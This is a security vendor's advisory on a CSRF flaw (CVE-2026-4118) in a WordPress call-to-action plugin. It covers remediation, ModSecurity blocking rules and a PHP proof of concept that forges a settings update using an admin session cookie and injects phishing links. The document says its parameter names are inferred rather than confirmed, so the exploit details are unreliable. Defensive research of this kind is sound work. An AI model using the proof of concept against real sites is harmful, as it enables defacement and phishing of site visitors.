Atomic Edge analysis of CVE-2026-4118 (metadata-based): A Cross-Site Request Forgery (CSRF) vulnerability in the Call To Action Plugin for WordPress (version 3.1.3 and earlier) allows unauthenticated attackers to modify plugin settings by tricking a site administrator into clicking a malicious link. The vulnerability resides in the cbox_options_page() function, which handles saving, creating, and deleting plugin settings without enforcing nonce validation. The CVSS score is 4.3 (Medium), with a vector indicating network attack vector, low complexity, no privileges required, user interaction required, and low impact on integrity.
Root Cause: The plugin fails to include a WordPress nonce field (wp_nonce_field()) in the settings form rendered on the admin page. Additionally, the save handler (cbox_options_page() or related function) does not call wp_verify_nonce() or check_admin_referer() before processing updates via $wpdb->update(). This absence of state-changing request validation is the classic pattern for CSRF vulnerabilities. Since no code diff is available, Atomic Edge analysis infers this from the CWE-352 classification and the description’s explicit mention of missing nonce validation and the lack of wp_nonce_field() in the form.
Exploitation: An attacker crafts a forged HTTP POST request to the WordPress admin area, targeting the URL /wp-admin/admin-post.php or directly to /wp-admin/options-general.php?page=call-to-action-plugin (depending on how the plugin registers its settings page). The request must include parameters to modify plugin settings such as the call-to-action title, content, link URL, image URL, colors, or other configuration options. Because the plugin lacks CSRF protection, the attacker does not need to include a valid nonce. The attacker then tricks a logged-in administrator into submitting this forged request (e.g., via a hidden form in an email or a cross-origin request from a malicious site). The specific parameters are inferred from the plugin’s settings structure; typical parameter names might include ‘cbox_title’, ‘cbox_content’, ‘cbox_link_url’, ‘cbox_image_url’, ‘cbox_color’, etc. The attacker can send the request via admin-ajax.php with a custom action (e.g., ‘cbox_save_options’) or via a direct POST to the settings page URL.
Remediation: The fix must add WordPress nonce validation to the settings form and its handler. Specifically, the plugin developer should add wp_nonce_field(‘cbox_save_options’, ‘cbox_nonce’) to the form HTML, and verify it in the save handler using if ( ! isset( $_POST[‘cbox_nonce’] ) || ! wp_verify_nonce( $_POST[‘cbox_nonce’], ‘cbox_save_options’ ) ) { return; } or by calling check_admin_referer(‘cbox_save_options’). Additionally, capability checks (e.g., current_user_can(‘manage_options’)) should be enforced to ensure only administrators can modify settings. Since no patched version is available, users should disable the plugin or implement a virtual patch.
Impact: Successful exploitation allows an attacker to modify the Call To Action plugin’s configuration, such as changing the displayed text, link destination, or visual styling. This can be used to redirect visitors to malicious websites, display phishing content, or deface the site. The impact is limited to integrity (low), as the attacker cannot directly access or modify user data, escalate privileges, or execute code. However, the ability to alter call-to-action content can damage the site’s trustworthiness and potentially be leveraged for social engineering attacks.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4118 (metadata-based)
# This rule blocks forged CSRF requests targeting the Call To Action Plugin settings.
# The vulnerability allows modification of plugin options via admin-post.php or admin-ajax.php without nonce.
# We infer the plugin uses option page slug 'call-to-action-plugin' and AJAX action 'cbox_save_options'.
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php"
"id:20264118,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via admin-post.php',severity:'CRITICAL',tag:'CVE-2026-4118'"
SecRule ARGS_POST:option_page "@streq call-to-action-plugin"
"chain"
SecRule ARGS_POST:action "@streq update"
"chain"
SecRule ARGS_POST:cbox_title "@rx .+"
""
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20264119,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via admin-ajax.php',severity:'CRITICAL',tag:'CVE-2026-4118'"
SecRule ARGS_POST:action "@streq cbox_save_options"
"chain"
SecRule ARGS_POST:cbox_title "@rx .+"
""
SecRule REQUEST_URI "@beginsWith /wp-admin/options-general.php"
"id:20264120,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via options page',severity:'CRITICAL',tag:'CVE-2026-4118'"
SecRule ARGS_GET:page "@streq call-to-action-plugin"
"chain"
SecRule REQUEST_METHOD "@streq POST"
""
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4118 - Call To Action Plugin <= 3.1.3 - Cross-Site Request Forgery via Settings Update
/**
* This PoC demonstrates how an unauthenticated attacker can forge a request
* to modify plugin settings by tricking an admin user into visiting a crafted page.
* Since no code diff is available, we infer the likely parameter names from the plugin's
* typical configuration structure. The attack targets the admin settings page or
* an AJAX handler that processes options updates without nonce validation.
*/
// Configuration: Set the target WordPress URL and admin's session cookie (obtained via social engineering)
$target_url = 'http://example.com/wordpress'; // CHANGE THIS to the target site
$admin_cookie = 'wordpress_logged_in_hash=...; wordpress_sec_hash=...'; // Attacker must obtain admin session
// Inferred plugin settings parameters (from typical call-to-action plugin naming conventions)
$post_data = array(
'option_page' => 'call-to-action-plugin',
'action' => 'update',
'_wp_http_referer' => '/wp-admin/options-general.php?page=call-to-action-plugin',
// The plugin likely uses a single option name storing an array, or individual options.
// We assume individual options based on description mentioning specific fields.
'cbox_title' => 'Click Here to Win!',
'cbox_content' => 'This is a phishing message.',
'cbox_link_url' => 'https://malicious-site.com/steal-credentials',
'cbox_image_url' => 'https://malicious-site.com/fake-logo.png',
'cbox_color' => '#ff0000',
'cbox_enabled' => '1',
// The nonce field is intentionally absent because the plugin lacks CSRF protection
);
// Alternatively, the plugin might process via admin-ajax.php
$ajax_action = 'cbox_save_options'; // Inferred action name
// Send forged request via admin-post.php (common for form submissions)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIE, $admin_cookie);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: " . $http_code . "n";
echo "Attempted to modify plugin settings. Check the target site to confirm changes.n";
// Note: The PoC requires a valid admin session cookie. The attacker must trick an admin into
// performing a request that includes their session (e.g., via a hidden iframe or form auto-submit).
// This script simulates the forged request from the attacker's server after obtaining the cookie.
